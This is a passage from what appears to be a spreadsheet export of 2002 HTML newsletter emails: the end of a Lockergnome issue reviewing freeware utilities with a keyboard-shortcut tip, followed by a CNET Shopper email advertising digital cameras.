 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Latest Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A title="freeware: CD player and organizer with CDDB support" HREF="http://www.mywebattack.com/gnomeapp.php?id=103625"&gt;VisiTrax Lite 2.91&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: cut MP3s without decompression" HREF="http://www.mywebattack.com/gnomeapp.php?id=102248"&gt;mp3DirectCut 1.23&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: color  picker and screen loupe" HREF="http://www.mywebattack.com/gnomeapp.php?id=100911"&gt;Cpick 2.6&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: image browser and viewer" HREF="http://www.mywebattack.com/gnomeapp.php?id=101726"&gt;Image Browser 4.4&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: more than 50 customizable Java scripts" HREF="http://www.mywebattack.com/gnomeapp.php?id=105051"&gt;EZ JavaScript 1.1&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: offline browser" HREF="http://www.mywebattack.com/gnomeapp.php?id=101610"&gt;WinHTTrack 3.20RC5&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: specialized virus removal" HREF="http://www.mywebattack.com/gnomeapp.php?id=102533"&gt;Panda Quick Rem 3.2.1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: personal file backup utility" HREF="http://www.mywebattack.com/gnomeapp.php?id=104556"&gt;EZBack-it-up 1.1&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: small slideshow viewer" HREF="http://www.mywebattack.com/gnomeapp.php?id=105052"&gt;ArtSee 1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: simple WAV file editor" HREF="http://www.mywebattack.com/gnomeapp.php?id=105053"&gt;Soliton 2&lt;/A&gt;&lt;BR&gt;
 &lt;A title="freeware: download manager" HREF="http://www.mywebattack.com/gnomeapp.php?id=100322"&gt;Fresh Download 4.30&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;GigAlarm v1.201 [33k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://users.bigpond.net.au/glina/GigAlarm.htm"&gt;http://users.bigpond.net.au/glina/GigAlarm.htm&lt;/a&gt;
 &lt;p&gt;
 {String on your finger} Sometimes, I'm a bit like the absent-minded professor... I would forget my own head if it wasn't attached. So naturally, I appreciate any program that can help keep me on track, and with GigAlarm I can setup whatever reminders/alarms I need. However, sometimes a simple text message just won't catch my attention. Well, herein lies the beauty of GigAlarm... it doesn't just have to give you a text alarm! GigAlarm can play a WAV file (random, or your selection), change your background, start a program, or use one of the many Windows shutdown options. My wife has gotten in the habit of using the Shutdown option as an alarm to signal that I have spent too long on the computer. (Lucky for me, there is a snooze button!) NOTE: The author says, "This program is essentially free to use for non-profit purposes... If you find this program useful I would appreciate $10 AUD (or $5 USD) as a token of your appreciation."
 &lt;p&gt;&lt;BR&gt;
 &lt;b&gt;Context Thumbview v1.0.b1 [107k] W9x/2K/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://contextmagic.netfirms.com/image-viewer/"&gt;http://contextmagic.netfirms.com/image-viewer/&lt;/a&gt;
 &lt;p&gt;
 {Peep show} I'm not always very patient, especially when it comes to my computer. Double-clicking on an image and waiting for it to come up in my image viewer is almost too much for me to handle. Lucky for me, Context Thumbview has made its way onto my system and I no longer have to wait to view an image. All I do now is right-click the image, choose "View Thumbnail," and there is the image, out there for me to see... all without me having to open up any programs! "As Express ThumbView is an Explorer extension, it is always ready and available for use. Moreover, it is available in any Explorer window, including Open and Save As... dialog boxes." As an added bonus, with Context Thumbview installed on my system, I can also turn off the thumbnail view if I want to save system resources.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&lt;b&gt;Starter v5.5.4.2175 [423k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://codestuff.tripod.com/"&gt;http://codestuff.tripod.com/&lt;/a&gt;
 &lt;p&gt;
 {Startup manager} This application bills itself as "Yet Another Startup Manager"... I don't think so! Starter isn't JUST another Startup Manager, it's a piece of programming art. One of my biggest problems with Windows Task Manager is that I don't know what all the processes on my machine are, or from where they are running. Starter not only gives me that information, but it also lets me save it as an HTML file. In addition, Starter lets me import and export registry keys or add a new task to be processed. Don't run all over your machine trying to find all the programs you need to control your PC, when you can do it all (and more!) with Starter.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&lt;b&gt;Aversoft Sticker v3.55 [592k] W9x/2k/XP US$15&lt;/b&gt;&lt;BR&gt;
     Unearthed by Sergei Lepyokhin
 &lt;p&gt;
 &lt;a class="URL" href="http://www.aversoft.com/sticker/"&gt;http://www.aversoft.com/sticker/&lt;/a&gt;
 &lt;p&gt;
 {Sticky notes} Did you know that Post-it(r) Notes were invented by accident? I use to have these notes all over my monitor. Now my screen is clean as a whistle! Aversoft Sticker is a program to help you remember "important information by displaying skinnable sticky notes on your Windows desktop." No more bland notes for me! With Sticker, I am surrounded with pictures of paradise (downloaded from Aversoft's website). These great features are no accident. Sticker also has a transparency feature that makes the notes only half visible, making it much easier to use while working on your other programs. Don't walk away yet though... Sticker also allows you to print your notes, lock them from accidentally being deleted, and set an alarm (repeating or one-time). Speaking of alarms, mine just went off and opened up Outlook. Time to send out today's newsletter!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&lt;b&gt;Wikipedia Encyclopedia&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.wikipedia.com/"&gt;http://www.wikipedia.com/&lt;/a&gt;
 &lt;p&gt;
 {We is smart} Those Saturday morning folks at ABC were right: it's great to learn, 'cause knowledge is power. I highly encourage everyone to learn something new each day, and with Wikipedia.com you can! Wikipedia is a free, and very thorough online encyclopedia; you'll be hard-pressed to stump this information tool with an undocumented topic. Know what you're looking for? Then just use the search tool. In the mood to fill your cranium with a few new thought processes? Just browse through any one of Wikipedia's many categories until you find a subject that piques your interest. From Physics to Opera; from Anthropology to Cooking, you will find it all here. Now, all that is missing is you! Take a look and beef up your gray matter.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Gnomies are known for their willingness to help others and Alex Warren is no exception with a tip on copying text. Alex writes: "Did you know that you can copy the contents of a message/dialog box just by pressing Ctrl+C?" Alex also had this to say: "When you select text and then use the mouse to drag it to a new location, the original text moves to the new location and disappears from the old location. However, you can select text and then use the right mouse button to drag it to a new location. When you do this, releasing the right mouse button opens a menu from which you can choose to move or copy the text (along with several other options)." Those are some great time saving tips Alex! Following suit with using Ctrl + C to copy... you can also use Ctrl + X to cut and Ctrl + V to paste. You can also use all these tips on more then just text! The next time you need to copy some files on your PC, try the right-click and drag method and you will see what I mean... along with saving yourself some time.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href="http://www.lockergnome.com/issues/daily/20020718.html"&gt;http://www.lockergnome.com/issues/daily/20020718.html&lt;/a&gt;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Sticker Courtesy   --&gt;
 Bacteria acts more intelligent than human beings.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great deals on perfect Summer cameras! (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Shopper Newsletter: Alerts&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table border=0 cellpadding=0 cellspacing=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=5&gt;
 			&lt;img src="http://www.cnet.com/i/sh/nl/442_shopperALERT.gif" width="442" height="60" border="0" alt="CNET Shopper Newsletter Alerts"&gt;&lt;br&gt;
 				&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#CCCCCC"&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=1&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" colspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#999999" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td bgcolor="#666666" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td width=9 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td  width=430&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;				
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#666666"&gt;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&lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /insert ad here --&gt;
 &lt;br&gt;
 &lt;!-- Most Popular --&gt;
 &lt;!-- /Most Popular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href="http://clickthru.online.com/Click?q=ba-m-45QXpKFQvcXk0xhOmI_uIUEknR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2htA0MTMJaylIO7r3fxeR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWaEORvLbI81u0PT_Qv1yR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWLWc3xKqSM_svdGheo-lR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjktmZIDv4sUb9HGRJ1bfeR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;!-- End Vertical Brick--&gt;
 					&lt;td width=9 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 						&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=10&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width=9 height=1&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td width=1 bgcolor="#666666" rowspan=2&gt;
 						&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=60&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr valign=top&gt;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width=410 bgcolor="#ffffff"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#EEEEEE"&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=10&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 								&lt;td&gt;
 									&lt;table cellpadding=0 cellspacing=0 border=0 width=400&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 											&lt;td align=right width=400&gt;&lt;img src="http://www.cnet.com/b.gif"&gt;&lt;br&gt;
 											&lt;font face="arial, helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;/td&gt;
 										&lt;tr valign=top&gt;
 &lt;!--c4s--&gt;									&lt;td&gt;&lt;A href="#c4s"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12														border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#c4s"&gt;&lt;b&gt;From Computers4Sure&lt;/b&gt;&lt;/A&gt;&lt;BR&gt;Fujifilm FinePix 30i just $245!&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 &lt;!--buy--&gt;							&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td&gt;&lt;A href="#buy"&gt;&lt;img src="http://www.cnet.com/i/nl/arr.gif" width=10 height=12 border=0&gt;&lt;/A&gt;&lt;/td&gt;
 											&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;A href="#buy"&gt;&lt;b&gt;From buy.com&lt;/b&gt;&lt;/A&gt; &lt;BR&gt;Great deals and free shipping!&lt;/font&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 								&lt;/table&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 					&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 						&lt;tr&gt;
 							&lt;td bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 &lt;br&gt;
 &lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- C4S TEMPLATE --&gt;
 &lt;a name="c4s"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;Computers4Sure&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235579.gif""&gt;&lt;/P&gt;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 Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIcz6q-7CRqUgeUef92iqrwyR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/8737557_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6y-hAFX6CGLs-y39w-_lR" &gt;&lt;B&gt;Fujifilm FinePix 30i &lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; 1,920,000 pixels&lt;BR&gt; 
 &amp;#149; 2.5 x digital zoom&lt;BR&gt;
 &amp;#149; MP3 player&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$299&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZA4uVxi0vIKlsTn8N_Jj9R" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/7189044_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSsa_Qyfag_9-hwkp_WEcR" &gt;&lt;B&gt;Olympus Camedia D-40 Zoom&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 4.0-megapixel, 1.8-in LCD monitor&lt;BR&gt;
 								&amp;#149; 2.8x optical/2.5x digital zoom&lt;BR&gt;
 								&amp;#149; Incl. 16MB SmartMedia card&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$599&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;
 							&lt;tr valign=top&gt;
 									&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDx-SME5r5vnMUN5xspoRR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/6939636_120_1.gif" width=120 height=90&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7no54ChgULIiSupcptbPMPR" &gt;&lt;B&gt;Sony Cyber Shot DSC-F707&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 5.0-megapixels, 1.8-in LCD&lt;BR&gt;
 								&amp;#149; 5x optical/10x digital zoom&lt;BR&gt;
 								&amp;#149; Incl. 16MB Memory Stick&lt;BR&gt;
 							    &amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$999&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;	
 &lt;!-- center ad --&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- /center ad --&gt;
 &lt;!-- buy.com TEMPLATE --&gt;
 &lt;a name="buy"&gt;
 					&lt;table cellpadding="0" cellspacing="0" border=0 width="410"&gt;
 						&lt;TBODY&gt;
 							&lt;tr&gt;
 								&lt;td valign=bottom&gt;&lt;font face="arial, helvetica" size="3"&gt;&lt;b&gt;buy.com&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 								&lt;td&gt;
 									&lt;P align=right&gt;	
 										&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/Images/Resellers/Premier/235276.gif""&gt;&lt;/P&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#eeeeee"&gt; &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=205 height=8&gt;&lt;/td&gt;
 								&lt;td bgcolor="#eeeeee"&gt; &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=205 height=8&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/TBODY&gt;
 					&lt;/table&gt;
 &lt;!-- Intro Blurb --&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=400 align=left&gt;
 							&lt;tr&gt;
 								&lt;td width="410" colspan="4"&gt;
 									&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1CkOxGr8fQffN5r5ls4rR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/8653940_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUwcap2xIDlq9S_p8qkEiiR" &gt;&lt;B&gt;Minolta Dimage X&lt;/b&gt;&lt;/a&gt; &lt;BR&gt;
 								&amp;#149; Free shipping &lt;BR&gt;&amp;#149; 2.1-megapixels, 1.5-in LCD&lt;BR&gt;
 								&amp;#149; 3xoptical zoom, 2xdigital&lt;BR&gt;
 								&amp;#149; Free shipping &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$347&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;						
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsKThOA9ioFjAi_TOlRfXPR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/7102086_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzismRJDEENBEZdihv9KnR" &gt;&lt;B&gt;Fujifilm FinePix 2600 Zoom&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping &lt;BR&gt;
 								&amp;#149; 2.1-megapixels, 1600x1200 res.&lt;BR&gt;
 								&amp;#149; 3x optical/2.5x digital Zoom &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$238&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 3 --&gt;&lt;tr valign=top&gt;
 								&lt;td width=120&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzoJ0A8fKlrZIGiR6ImOeR" &gt;&lt;img style="border: #CCCCCC solid 1px;" src="http://shopper.cnet.com/i/ce/ps/120/9791461_120_1.gif"&gt;&lt;/a&gt;&lt;/td&gt;
 								&lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 								&lt;td width=270 colspan="2"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8HTzm8K6XWDjP2qJ13b4yR" &gt;&lt;B&gt;Minolta Dimage F100&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping&lt;BR&gt;
 								&amp;#149; Super-fine 4-megapixel images &lt;BR&gt;
 								&amp;#149; Sleek, slim design&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$600&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=12&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;		 
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;p&gt;
 &lt;/p&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="612" bgcolor="#666666" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#CCCCCC"&gt;&lt;img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bgcolor="#666666"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width="599" bgcolor="#EEEEEE"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="4"&gt;&lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="612" bgcolor="#EEEEEE" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;
 &lt;td width="1" bgcolor="#999999"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="9" bgcolor="#CCCCCC"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#666666"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="12"&gt;&lt;img src="http://www.cnet.com/b.gif" width="12" height="1"&gt;&lt;/td&gt;
 &lt;td width="575"&gt;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=22-xNnrzPdRQ_dbkTawonNvVurSXuostdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzFSrGFW9tQ93KjZ6eJcneR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
